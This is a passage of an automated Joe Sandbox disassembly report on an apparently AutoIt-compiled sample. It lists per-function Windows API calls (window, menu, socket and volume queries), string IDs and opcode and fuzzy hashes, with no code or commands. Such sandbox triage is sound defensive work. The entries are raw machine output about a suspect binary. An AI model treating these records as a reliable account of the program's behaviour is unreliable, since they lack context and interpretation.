                                                        • Opcode Fuzzy Hash: b9c5c4302d198ca1afb89806505c7799ee6253190c24b31b951795b6783fd032
                                                        • Instruction Fuzzy Hash: A8318071E00218BBDB21DB99D885DDEBBFEEB86350B54416BF404DB321D6B08E41DB94
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 0070C306
                                                        • DeleteMenu.USER32(?,00000007,00000000), ref: 0070C34C
                                                        • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00771990,01655AA8), ref: 0070C395
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Menu$Delete$InfoItem
                                                        • String ID: 0
                                                        • API String ID: 135850232-4108050209
                                                        • Opcode ID: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
                                                        • Instruction ID: e163f0531d40c3ba53535d2f79db46afa1582ff19c672ee26cc1a05a133a3d68
                                                        • Opcode Fuzzy Hash: ef222650756722c2f147eb816ef4baa3b6401e9da11f9df8ac5d8c2115448ca3
                                                        • Instruction Fuzzy Hash: 6A418E31204301DFD721DF25D885B5AFBE4AF85320F148B1DF9A5972D2D778A904CB66
                                                        APIs
                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0073CC08,00000000,?,?,?,?), ref: 007344AA
                                                        • GetWindowLongW.USER32 ref: 007344C7
                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 007344D7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$Long
                                                        • String ID: SysTreeView32
                                                        • API String ID: 847901565-1698111956
                                                        • Opcode ID: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
                                                        • Instruction ID: cfc34403f3f6d595c396dcaec67ca3c5c1230e5cb5e3cc5af9bffa61ffc270b7
                                                        • Opcode Fuzzy Hash: 741861332c2f4d04d64ea7bce2f99265fbb76d24030d475a36f79ba2002fad08
                                                        • Instruction Fuzzy Hash: 6831B072200245AFEF259E38DC45BDA77A9EB09334F204329F975A21D2D778EC509B50
                                                        APIs
                                                        • SysReAllocString.OLEAUT32(?,?), ref: 00706EED
                                                        • VariantCopyInd.OLEAUT32(?,?), ref: 00706F08
                                                        • VariantClear.OLEAUT32(?), ref: 00706F12
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$AllocClearCopyString
                                                        • String ID: *jp
                                                        • API String ID: 2173805711-93120565
                                                        • Opcode ID: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
                                                        • Instruction ID: 5b3c1f2cdea079008f96e768deb8176dc23a8ffb2538e88ff3a70f5686cc1dbf
                                                        • Opcode Fuzzy Hash: dc0dd8ba88cf6aff0418fa0e65a592e7c8a3f2a075c5c9efa24fae34eb454ac5
                                                        • Instruction Fuzzy Hash: 51317371604246DFCB05BFA4E8619BD77B6FF45B00B1045ADF9025B2E2CB38AD21DB94
                                                        APIs
                                                          • Part of subcall function 0072335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00723077,?,?), ref: 00723378
                                                        • inet_addr.WSOCK32(?), ref: 0072307A
                                                        • _wcslen.LIBCMT ref: 0072309B
                                                        • htons.WSOCK32(00000000), ref: 00723106
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ByteCharMultiWide_wcslenhtonsinet_addr
                                                        • String ID: 255.255.255.255
                                                        • API String ID: 946324512-2422070025
                                                        • Opcode ID: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
                                                        • Instruction ID: db5b3eae0c393ecf382a92312da3f431f7597c4c1563a68dae500d051b3dbb12
                                                        • Opcode Fuzzy Hash: a050ac09e25e6383d33d2fc820a313d1ae1d653728b7dc671bf09e770f50bc08
                                                        • Instruction Fuzzy Hash: 4331B0352002259FDB20CF68D486EAA77E1EF15318F248459E9158B392DB7EEF41CB70
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00734705
                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00734713
                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 0073471A
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$DestroyWindow
                                                        • String ID: msctls_updown32
                                                        • API String ID: 4014797782-2298589950
                                                        • Opcode ID: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
                                                        • Instruction ID: d544ebcaaf014f5b08f46947b5a8584efad117a67e55ba6fc5fde4c597980978
                                                        • Opcode Fuzzy Hash: 2caa4e7974324a902149034c69d4e480101339417a285691e3ad28790aa2384a
                                                        • Instruction Fuzzy Hash: ED218EB5600208AFEB15DF68DC81DA737ADEB4A3A4B040049FA049B292CB34FC51CB64
                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _wcslen
                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                        • API String ID: 176396367-2734436370
                                                        • Opcode ID: 350bd5398ca8d696b9d9dcfb5531e00d31329f8a5605977dc30c5efe75447ad0
                                                        • Instruction ID: 18bd9e387c2948362e2ffc1ff854b1acdd99b7a952284e26b84a9093e1e39678
                                                        • Opcode Fuzzy Hash: 350bd5398ca8d696b9d9dcfb5531e00d31329f8a5605977dc30c5efe75447ad0
                                                        • Instruction Fuzzy Hash: B821F6B2104511FAD331BB259C02FB7B3D9DF55310F14412EFA49971C3EB5A9D51C2A9
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00733840
                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00733850
                                                        • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00733876
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend$MoveWindow
                                                        • String ID: Listbox
                                                        • API String ID: 3315199576-2633736733
                                                        • Opcode ID: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
                                                        • Instruction ID: 42b450c8752c7774a7e41c1436ec190cd53fbeb4fe135ff70589103d21c45eff
                                                        • Opcode Fuzzy Hash: d8e5db9608363c864385bfc6c418f5f9c8c7d3f966c9c7db7f65b698b5b52f74
                                                        • Instruction Fuzzy Hash: E021BE72610218BBFB218F54CC85EEB376AEF89760F108124F9049B191C679DC528BA0
                                                        APIs
                                                        • SetErrorMode.KERNEL32(00000001), ref: 00714A08
                                                        • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00714A5C
                                                        • SetErrorMode.KERNEL32(00000000,?,?,0073CC08), ref: 00714AD0
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorMode$InformationVolume
                                                        • String ID: %lu
                                                        • API String ID: 2507767853-685833217
                                                        • Opcode ID: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
                                                        • Instruction ID: cb170029d758d65edacdda948b7ae62ed7a3399b4f28d2a3d1d85fef7df0470b
                                                        • Opcode Fuzzy Hash: c5a213d6848a4408f52b376e824fd5b39979ab693d448f3b6b2ab58b5cfbfd29
                                                        • Instruction Fuzzy Hash: ED319375A00108AFD710DF54C885EAA7BF9EF05304F148098F905DB352D775ED45CB61
                                                        APIs
                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 0073424F
                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00734264
                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00734271
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: MessageSend
                                                        • String ID: msctls_trackbar32
                                                        • API String ID: 3850602802-1010561917
                                                        • Opcode ID: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
                                                        • Instruction ID: aaf957582c7a7f2fe527584eec4b2bd8fae69d44281804eab91ad1e0dad84cf3
                                                        • Opcode Fuzzy Hash: 57405de43975b38806ee998c30c825e9e2143d80186ce07b087349f949837cfd
                                                        • Instruction Fuzzy Hash: A611E031240208BEFF209E29CC06FAB3BACEF85B64F010128FA55E20A1D275EC519B24
                                                        APIs
                                                          • Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A
                                                          • Part of subcall function 00702DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00702DC5
                                                          • Part of subcall function 00702DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00702DD6
                                                          • Part of subcall function 00702DA7: GetCurrentThreadId.KERNEL32 ref: 00702DDD
                                                          • Part of subcall function 00702DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00702DE4
                                                        • GetFocus.USER32 ref: 00702F78
                                                          • Part of subcall function 00702DEE: GetParent.USER32(00000000), ref: 00702DF9
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 00702FC3
                                                        • EnumChildWindows.USER32(?,0070303B), ref: 00702FEB
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
                                                        • String ID: %s%d
                                                        • API String ID: 1272988791-1110647743
                                                        • Opcode ID: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
                                                        • Instruction ID: f0e49381a26ccbec12e025c07b2a0eeb443600d25fab1587c7d2e22dcd5b6bf3
                                                        • Opcode Fuzzy Hash: f2d8825d476a3368c2a4428391fefb9a236c50065d71ce948578d0d3a7cf71d0
                                                        • Instruction Fuzzy Hash: 1211A571700205EBDF557F60CD8AEED77AAAF84304F048179B909AB292DE389D458B70
                                                        APIs
                                                        • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358C1
                                                        • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 007358EE
                                                        • DrawMenuBar.USER32(?), ref: 007358FD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Menu$InfoItem$Draw
                                                        • String ID: 0
                                                        • API String ID: 3227129158-4108050209
                                                        • Opcode ID: 71b48c9b3ce7e5e22431bdbc9501ab591b5b5eacbc24c11325ec2c3158883e89
                                                        • Instruction ID: b180e06f6cbc8bb2d56fdce2555b2d932c1ce83df396fe9c093ebe25a8f30871
                                                        • Opcode Fuzzy Hash: 71b48c9b3ce7e5e22431bdbc9501ab591b5b5eacbc24c11325ec2c3158883e89
                                                        • Instruction Fuzzy Hash: D601C072500218EFEB619F11DC44BEEBBB5FF45361F108099E848D6162DB349A90DF31
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
                                                        • Instruction ID: cb24bacaf032ce2f4eec77006387ddcb3c7c513050a415d168a9e233a9d40d34
                                                        • Opcode Fuzzy Hash: 154214863d6c95753a4e4eeae66ad26555f733ff76084db7707b4e39bc29e638
                                                        • Instruction Fuzzy Hash: 01C14A75A0020AEFDB15CF94C894BAEB7B5FF48324F108698E505EB291D735DE41DB90
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Variant$ClearInitInitializeUninitialize
                                                        • String ID:
                                                        • API String ID: 1998397398-0
                                                        • Opcode ID: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
                                                        • Instruction ID: 998ca5ac682de1fcaa4ad5896f682f1a46ec29df3e7659360874404d48ce2718
                                                        • Opcode Fuzzy Hash: 63f5d9529ec3881b6d061af37956bd0dc535072b2bbedff3faeb7e50ff083090
                                                        • Instruction Fuzzy Hash: CBA14B756042109FC700EF28D885A2AB7E5FF89714F04885DF98A9B362DB38EE41CF95
                                                        APIs
                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 007005F0
                                                        • CoTaskMemFree.OLE32(00000000,00000000,?,00000000,00000800,00000000,?,0073FC08,?), ref: 00700608
                                                        • CLSIDFromProgID.OLE32(?,?,00000000,0073CC40,000000FF,?,00000000,00000800,00000000,?,0073FC08,?), ref: 0070062D
                                                        • _memcmp.LIBVCRUNTIME ref: 0070064E
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: FromProg$FreeTask_memcmp
                                                        • String ID:
                                                        • API String ID: 314563124-0
                                                        • Opcode ID: 4d1464635aeecad16aad7b3d3dcc6b95a920776876e3c8f2ad49f66182b9c1e0
                                                        • Instruction ID: c1b7f75451e72aa6405368a140206537be626715736f07a76c6b3ac841f88fb2
                                                        • Opcode Fuzzy Hash: 4d1464635aeecad16aad7b3d3dcc6b95a920776876e3c8f2ad49f66182b9c1e0
                                                        • Instruction Fuzzy Hash: 2581FC75A00109EFCB04DF94C984EEEB7F9FF89315F204558E506AB291DB75AE06CBA0
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: _free
                                                        • String ID:
                                                        • API String ID: 269201875-0
                                                        • Opcode ID: 4a15ddf5335cf03118919905a59ca73b6bca1f92010db54c2074e107fb8336b6
                                                        • Instruction ID: 899d48b519e8e75515011c4a36ecfd4b3eed6ebf16c735a13822f1465409d676
                                                        • Opcode Fuzzy Hash: 4a15ddf5335cf03118919905a59ca73b6bca1f92010db54c2074e107fb8336b6
                                                        • Instruction Fuzzy Hash: 2A41F971A01751DBDB216BFA8C45ABE3AE7EF43330F14422EF415DA3D2E6344941B265
                                                        APIs
                                                        • GetWindowRect.USER32(0165F7C8,?), ref: 007362E2
                                                        • ScreenToClient.USER32(?,?), ref: 00736315
                                                        • MoveWindow.USER32(?,?,?,?,000000FF,00000001,?,?,?,?,?), ref: 00736382
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: Window$ClientMoveRectScreen
                                                        • String ID:
                                                        • API String ID: 3880355969-0
                                                        • Opcode ID: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
                                                        • Instruction ID: a101ca1d91636d884a4cd857d2b7ee0498b78238d46cbfad2bb8c3c59bf0dd46
                                                        • Opcode Fuzzy Hash: 5670d1c66874b80eb5c5adaa2eeaf1e2ddc31db315e39fdaf56c6766f994e444
                                                        • Instruction Fuzzy Hash: CA512875A00249EFEF10DF68D880AAE7BB6FB45360F108169F9159B2A1D734ED81CB50
                                                        APIs
                                                        • socket.WSOCK32(00000002,00000002,00000011), ref: 00721AFD
                                                        • WSAGetLastError.WSOCK32 ref: 00721B0B
                                                        • #21.WSOCK32(?,0000FFFF,00000020,00000002,00000004), ref: 00721B8A
                                                        • WSAGetLastError.WSOCK32 ref: 00721B94
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd
                                                        Similarity
                                                        • API ID: ErrorLast$socket
                                                        • String ID:
                                                        • API String ID: 1881357543-0
                                                        • Opcode ID: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
                                                        • Instruction ID: 22d4808ad67bff98c2dfc6a761b9f8c869a3e585618e4f92c1bc7d3e3c104822
                                                        • Opcode Fuzzy Hash: cd094938407b95fa65e28e6d47345692c58e2ed0aed746cd154ad9788911593d
                                                        • Instruction Fuzzy Hash: 5841CE74600200AFE720AF20D886F6A77E6AB45718F54848CFA1A9F2D2D776ED418B94
                                                        Memory Dump Source
                                                        • Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true
                                                        • Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
